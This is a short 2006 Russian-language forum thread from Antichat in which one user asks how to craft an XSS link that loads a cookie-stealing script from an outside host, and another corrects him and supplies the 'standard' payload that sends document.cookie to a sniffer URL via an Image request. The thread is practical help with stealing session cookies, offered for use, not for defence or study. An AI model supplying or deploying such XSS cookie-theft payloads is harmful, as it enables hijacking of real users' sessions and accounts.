Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Xss (https://forum.antichat.xyz/showthread.php?t=23171)

Mikel21 27.08.2006 10:51
Xss
 
Привет!

Обычно XSS атака выглядет так </a><script src="http://sdf.ru/dsf.js"</script><a>. А если я сделал скрипт для приёма куков через .gif. Т.е. kartinka.gif значит будет <script src="http://sdf.ru/dsf.gif"</script>

И еще нужно xss только через осла будет работать?

.Slip 27.08.2006 11:08
Цитата:
А если я сделал скрипт для приёма куков через .gif
Лол, вообще то почти все снифферы через .gif или .jpg.
Цитата:
И еще нужно xss только через осла будет работать?
Есть коды, которые заставляют работать JS и в опере, и в огнелисе. Но приписать их к обычной ссылке врядли удасться.
Цитата:
<script src="http://sdf.ru/dsf.gif"</script>
Хоть бы теги правильно закрыл

Mikel21 27.08.2006 13:13
Цитата:
Сообщение от [sL1p]
Лол, вообще то почти все снифферы через .gif или .jpg.

Есть коды, которые заставляют работать JS и в опере, и в огнелисе. Но приписать их к обычной ссылке врядли удасться.

Хоть бы теги правильно закрыл
а тогда как правильно ссылку составить, скажи пожалуйста!

.Slip 27.08.2006 13:40
Цитата:
Обычно XSS атака выглядет так </a><script src="http://sdf.ru/dsf.js"</script><a>
Что то это не обычно. И закрытый тег <a> вообще не к месту.
Цитата:
а тогда как правильно ссылку составить, скажи пожалуйста!
Стандартный скрипт для xss выглядит вот так:
<script>img = new Image(); img.src = "ссылка на сниффер"+document.cookie;</script>


Время: 07:26